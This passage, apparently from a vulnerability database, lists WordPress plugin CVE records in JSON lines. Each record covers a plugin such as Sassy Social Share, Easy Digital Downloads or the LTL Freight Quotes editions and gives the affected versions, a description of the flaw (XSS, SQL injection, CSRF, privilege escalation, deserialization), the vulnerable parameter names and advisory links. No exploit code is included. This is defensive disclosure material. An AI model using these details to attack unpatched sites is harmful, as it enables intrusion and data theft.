version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/64eb3d67-7056-4a03-ba3b-a04c2e96648d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/64eb3d67-7056-4a03-ba3b-a04c2e96648d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3078394\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3078394\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4673","slug":"rate-my-post","versionEndExcluding":"3.3.9","description":"The Rate my Post WordPress plugin before 3.3.9 does not validate and escape one of its shortcode attributes, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attack.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1c4f379d-252a-487b-81c9-bf711ab71dff\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1c4f379d-252a-487b-81c9-bf711ab71dff\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0429","slug":"watu","versionEndExcluding":"3.3.8.2","description":"The Watu Quiz WordPress plugin before 3.3.8.2 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/67d84549-d368-4504-9fa9-b1fce63cb967\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/67d84549-d368-4504-9fa9-b1fce63cb967\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0428","slug":"watu","versionEndExcluding":"3.3.8.2","description":"The Watu Quiz WordPress plugin before 3.3.8.2 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c933460b-f77d-4986-9f5a-32d9f3f8b412\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c933460b-f77d-4986-9f5a-32d9f3f8b412\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13488","slug":"ltl-freight-quotes-estes-edition","versionImpact":"3.3.7","versionEndExcluding":"3.3.8","description":"The LTL Freight Quotes \u2013 Estes Edition plugin for WordPress is vulnerable to SQL Injection via the 'dropship_edit_id' and 'edit_id' parameters in all versions up to, and including, 3.3.7 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 3.3.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ltl-freight-quotes-estes-edition\\\/trunk\\\/warehouse-dropship\\\/wild\\\/includes\\\/wild-delivery-save.php#L250\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ltl-freight-quotes-estes-edition\\\/trunk\\\/warehouse-dropship\\\/wild\\\/includes\\\/wild-delivery-save.php#L250\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ltl-freight-quotes-estes-edition\\\/trunk\\\/warehouse-dropship\\\/wild\\\/includes\\\/wild-delivery-save.php#L364\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ltl-freight-quotes-estes-edition\\\/trunk\\\/warehouse-dropship\\\/wild\\\/includes\\\/wild-delivery-save.php#L364\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3239967%40ltl-freight-quotes-estes-edition&new=3239967%40ltl-freight-quotes-estes-edition&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3239967%40ltl-freight-quotes-estes-edition&new=3239967%40ltl-freight-quotes-estes-edition&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b77b064d-ab8c-4e84-b5cc-efbdeefbf502?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b77b064d-ab8c-4e84-b5cc-efbdeefbf502?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13485","slug":"ltl-freight-quotes-abf-freight-edition","versionImpact":"3.3.7","versionEndExcluding":"3.3.8","description":"The LTL Freight Quotes \u2013 ABF Freight Edition plugin for WordPress is vulnerable to SQL Injection via the 'edit_id' and 'dropship_edit_id' parameters in all versions up to, and including, 3.3.7 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 3.3.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3242640%40ltl-freight-quotes-abf-freight-edition&new=3242640%40ltl-freight-quotes-abf-freight-edition&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3242640%40ltl-freight-quotes-abf-freight-edition&new=3242640%40ltl-freight-quotes-abf-freight-edition&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9fbb4f9a-4c68-4ddb-8e49-9629114b11ec?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9fbb4f9a-4c68-4ddb-8e49-9629114b11ec?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4624","slug":"gs-logo-slider","versionEndExcluding":"3.3.8","description":"The GS Logo Slider WordPress plugin before 3.3.8 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e7dc0202-6be4-46fc-a451-fb3a25727b51\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e7dc0202-6be4-46fc-a451-fb3a25727b51\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2080","slug":"wp-poll","versionImpact":"3.3.76","versionEndExcluding":"3.3.77","description":"The LiquidPoll \u2013 Polls, Surveys, NPS and Feedback Reviews plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.3.76 via the poller_list shortcode. This makes it possible for authenticated attackers, with contributor-level access and above, to extract information from polls that may be private.","recommendation":"Update to version 3.3.77, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/84f57623-b6a6-4717-857d-93fa9d279882?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/84f57623-b6a6-4717-857d-93fa9d279882?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3054831%40wp-poll&new=3054831%40wp-poll&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3054831%40wp-poll&new=3054831%40wp-poll&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5528","slug":"sassy-social-share","versionImpact":"3.3.75","versionEndExcluding":"3.3.76","description":"The Social Sharing Plugin \u2013 Sassy Social Share plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the heateor_mastodon_share parameter in all versions up to, and including, 3.3.75 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action, such as clicking on a link.","recommendation":"Update to version 3.3.76, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sassy-social-share\\\/tags\\\/3.3.75\\\/public\\\/class-sassy-social-share-public.php#L1481\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sassy-social-share\\\/tags\\\/3.3.75\\\/public\\\/class-sassy-social-share-public.php#L1481\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/99e922ec-d40a-47e7-a10f-d966a351d182?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/99e922ec-d40a-47e7-a10f-d966a351d182?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11252","slug":"sassy-social-share","versionImpact":"3.3.69","versionEndExcluding":"3.3.70","description":"The Social Sharing Plugin \u2013 Sassy Social Share plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the heateor_mastodon_share parameter in all versions up to, and including, 3.3.69 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 3.3.70, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sassy-social-share\\\/tags\\\/3.3.69\\\/public\\\/class-sassy-social-share-public.php#L1478\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sassy-social-share\\\/tags\\\/3.3.69\\\/public\\\/class-sassy-social-share-public.php#L1478\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sassy-social-share\\\/tags\\\/3.3.69\\\/public\\\/class-sassy-social-share-public.php#L1481\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sassy-social-share\\\/tags\\\/3.3.69\\\/public\\\/class-sassy-social-share-public.php#L1481\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3d065c2a-da7d-469a-b57d-f2fd5b760ff4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3d065c2a-da7d-469a-b57d-f2fd5b760ff4?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2252","slug":"easy-digital-downloads","versionImpact":"3.3.6.1","versionEndExcluding":"3.3.7","description":"The Easy Digital Downloads \u2013 eCommerce Payments and Subscriptions made easy plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.3.6.1 via the edd_ajax_get_download_title() function. This makes it possible for unauthenticated attackers to extract private post titles of downloads. The impact here is minimal.","recommendation":"Update to version 3.3.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-digital-downloads\\\/tags\\\/3.3.6.1\\\/includes\\\/ajax-functions.php#L459\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-digital-downloads\\\/tags\\\/3.3.6.1\\\/includes\\\/ajax-functions.php#L459\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-digital-downloads\\\/tags\\\/3.3.6.1\\\/includes\\\/ajax-functions.php#L466\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-digital-downloads\\\/tags\\\/3.3.6.1\\\/includes\\\/ajax-functions.php#L466\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3257409\\\/easy-digital-downloads\\\/trunk\\\/includes\\\/ajax-functions.php?contextall=1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3257409\\\/easy-digital-downloads\\\/trunk\\\/includes\\\/ajax-functions.php?contextall=1\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3257409\\\/easy-digital-downloads\\\/trunk\\\/includes\\\/ajax-functions.php?old=3226442&old_path=easy-digital-downloads%2Ftrunk%2Fincludes%2Fajax-functions.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3257409\\\/easy-digital-downloads\\\/trunk\\\/includes\\\/ajax-functions.php?old=3226442&old_path=easy-digital-downloads%2Ftrunk%2Fincludes%2Fajax-functions.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9e0e3b81-55fe-46b2-bae1-d7321d74c485?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9e0e3b81-55fe-46b2-bae1-d7321d74c485?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4924","slug":"sassy-social-share","versionImpact":"3.3.62","versionEndExcluding":"3.3.63","description":"The Social Sharing Plugin  WordPress plugin before 3.3.63 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 3.3.63, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1867505f-d112-4919-9fd5-01745aa0433e\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1867505f-d112-4919-9fd5-01745aa0433e\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1450","slug":"chaty","versionImpact":"3.3.5","versionEndExcluding":"3.3.6","description":"The Floating Chat Widget: Contact Chat Icons, Telegram Chat, Line Messenger, WeChat, Email, SMS, Call Button, WhatsApp \u2013 Chaty plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018data-hover\u2019 parameter in all versions up to, and including, 3.3.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.3.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/chaty\\\/tags\\\/3.3.4\\\/js\\\/cht-front-script.js#L389\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/chaty\\\/tags\\\/3.3.4\\\/js\\\/cht-front-script.js#L389\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/chaty\\\/tags\\\/3.3.5\\\/js\\\/cht-front-script.min.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/chaty\\\/tags\\\/3.3.5\\\/js\\\/cht-front-script.min.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3246336\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3246336\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a87d0966-3fd4-46f8-acd5-1cf0cb18af42?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a87d0966-3fd4-46f8-acd5-1cf0cb18af42?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6447","slug":"eventprime-event-calendar-management","versionImpact":"3.3.5","versionEndExcluding":"3.3.6","description":"The EventPrime WordPress plugin before 3.3.6 lacks authentication and authorization, allowing unauthenticated visitors to access private and password protected Events by guessing their numeric id\/event name.","recommendation":"Update to version 3.3.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e366881c-d21e-4063-a945-95e6b080a373\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e366881c-d21e-4063-a945-95e6b080a373\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3662","slug":"fancybox-for-wordpress","versionImpact":"3.3.5","versionEndExcluding":"3.3.6","description":"The FancyBox for WordPress plugin before 3.3.6 does not escape captions and titles attributes before using them to populate galleries' caption fields. The issue was received as a Contributor+ Stored XSS, however one of our researcher (Marc Montpas) escalated it to an Unauthenticated Stored XSS","recommendation":"Update to version 3.3.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4cda12f0-3c23-44ad-80ea-db2443ebcf82\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4cda12f0-3c23-44ad-80ea-db2443ebcf82\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4cda12f0-3c23-44ad-80ea-db2443ebcf82\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4cda12f0-3c23-44ad-80ea-db2443ebcf82\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1122","slug":"wp-event-solution","versionImpact":"3.3.50","versionEndExcluding":"3.3.51","description":"The Event Manager, Events Calendar, Events Tickets for WooCommerce \u2013 Eventin plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the export_data() function in all versions up to, and including, 3.3.50. This makes it possible for unauthenticated attackers to export event data.","recommendation":"Update to version 3.3.51, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0cbdf679-1657-4249-a433-8fe0cddd94be?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0cbdf679-1657-4249-a433-8fe0cddd94be?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3033231\\\/wp-event-solution\\\/tags\\\/3.3.51\\\/core\\\/admin\\\/hooks.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3033231\\\/wp-event-solution\\\/tags\\\/3.3.51\\\/core\\\/admin\\\/hooks.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3774","slug":"wise-chat","versionImpact":"3.3.4","versionEndExcluding":"3.3.5","description":"The Wise Chat plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the X-Forwarded-For header in all versions up to, and including, 3.3.4 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.3.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wise-chat\\\/tags\\\/3.3.3\\\/src\\\/admin\\\/WiseChatKicksTab.php#L11\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wise-chat\\\/tags\\\/3.3.3\\\/src\\\/admin\\\/WiseChatKicksTab.php#L11\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/34fd5045-cd38-4eab-9e97-98f1e3d7423a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/34fd5045-cd38-4eab-9e97-98f1e3d7423a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13481","slug":"ltl-freight-quotes-rl-edition","versionImpact":"3.3.4","versionEndExcluding":"3.3.5","description":"The LTL Freight Quotes \u2013 R+L Carriers Edition plugin for WordPress is vulnerable to SQL Injection via the 'edit_id' and 'dropship_edit_id' parameters in all versions up to, and including, 3.3.4 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 3.3.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3241903\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3241903\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b0f3cdce-e239-4c2f-83e3-e8d0b528d39e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b0f3cdce-e239-4c2f-83e3-e8d0b528d39e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9654","slug":"easy-digital-downloads","versionImpact":"3.3.4","versionEndExcluding":"3.3.5","description":"The Easy Digital Downloads plugin for WordPress is vulnerable to Improper Authorization in versions 3.1 through 3.3.4. This is due to a lack of sufficient validation checks within the 'verify_guest_email' function to ensure the requesting user is the intended recipient of the purchase receipt. This makes it possible for unauthenticated attackers to bypass intended security restrictions and view the receipts of other users, which contains a link to download paid content. Successful exploitation requires knowledge of another customers email address as well as the file ID of the content they purchased.","recommendation":"Update to version 3.3.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3188001\\\/easy-digital-downloads\\\/trunk\\\/includes\\\/blocks\\\/includes\\\/orders\\\/functions.php?old=2990247&old_path=easy-digital-downloads%2Ftrunk%2Fincludes%2Fblocks%2Fincludes%2Forders%2Ffunctions.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3188001\\\/easy-digital-downloads\\\/trunk\\\/includes\\\/blocks\\\/includes\\\/orders\\\/functions.php?old=2990247&old_path=easy-digital-downloads%2Ftrunk%2Fincludes%2Fblocks%2Fincludes%2Forders%2Ffunctions.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d3f4de75-abf5-46e8-854d-be91ed74a5f3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d3f4de75-abf5-46e8-854d-be91ed74a5f3?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12771","slug":"ecommerce-product-catalog","versionImpact":"3.3.43","versionEndExcluding":"3.3.44","description":"The eCommerce Product Catalog Plugin for WordPress plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.3.43. This is due to missing or incorrect nonce validation on the 'customer_panel_password_reset' function. This makes it possible for unauthenticated attackers to reset the password of any administrator or customer account via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 3.3.44, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ecommerce-product-catalog\\\/trunk\\\/modules\\\/cart\\\/includes\\\/customers\\\/includes\\\/transactions\\\/customer-panel.php#L108\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ecommerce-product-catalog\\\/trunk\\\/modules\\\/cart\\\/includes\\\/customers\\\/includes\\\/transactions\\\/customer-panel.php#L108\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ecommerce-product-catalog\\\/trunk\\\/modules\\\/cart\\\/includes\\\/customers\\\/includes\\\/transactions\\\/customer-panel.php#L44\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ecommerce-product-catalog\\\/trunk\\\/modules\\\/cart\\\/includes\\\/customers\\\/includes\\\/transactions\\\/customer-panel.php#L44\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3210939\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3210939\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3513ec24-0b1b-4528-9f89-eee5654e4e98?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3513ec24-0b1b-4528-9f89-eee5654e4e98?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7291","slug":"jetformbuilder","versionImpact":"3.3.4.1","versionEndExcluding":"3.3.4.2","description":"The JetFormBuilder plugin for WordPress is vulnerable to privilege escalation in all versions up to, and including, 3.3.4.1. This is due to improper restriction on user meta fields. This makes it possible for authenticated attackers, with administrator-level and above permissions, to register as super-admins on the sites configured as multi-sites.","recommendation":"Update to version 3.3.4.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0d8ea1c2-7c6e-43b3-97ca-a06438d51d11?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0d8ea1c2-7c6e-43b3-97ca-a06438d51d11?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/jetformbuilder\\\/tags\\\/3.3.4.1\\\/includes\\\/actions\\\/types\\\/register-user.php#L220\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/jetformbuilder\\\/tags\\\/3.3.4.1\\\/includes\\\/actions\\\/types\\\/register-user.php#L220\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/jetformbuilder\\\/tags\\\/3.3.4.1\\\/includes\\\/actions\\\/methods\\\/update-user\\\/user-meta-property.php#L23\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/jetformbuilder\\\/tags\\\/3.3.4.1\\\/includes\\\/actions\\\/methods\\\/update-user\\\/user-meta-property.php#L23\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-2439","slug":"easy-digital-downloads","versionImpact":"3.3.3","versionEndExcluding":"3.3.4","description":"The Easy Digital Downloads \u2013 Simple eCommerce for Selling Digital Files plugin for WordPress is vulnerable to deserialization of untrusted input via the 'upload[file]' parameter in versions up to, and including 3.3.3. This makes it possible for authenticated administrative users to call files using a PHAR wrapper, that will deserialize and call arbitrary PHP Objects that can be used to perform a variety of malicious actions granted a POP chain is also present.","recommendation":"Update to version 3.3.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/644c8702-08ad-4048-ae91-041f1771f1dc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/644c8702-08ad-4048-ae91-041f1771f1dc?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3154854\\\/easy-digital-downloads\\\/tags\\\/3.3.4\\\/includes\\\/admin\\\/import\\\/import-functions.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3154854\\\/easy-digital-downloads\\\/tags\\\/3.3.4\\\/includes\\\/admin\\\/import\\\/import-functions.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3154854\\\/easy-digital-downloads\\\/tags\\\/3.3.4\\\/src\\\/Utils\\\/FileSystem.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3154854\\\/easy-digital-downloads\\\/tags\\\/3.3.4\\\/src\\\/Utils\\\/FileSystem.php\",\"refsource\":\"\",\"tags\":[]}]"}
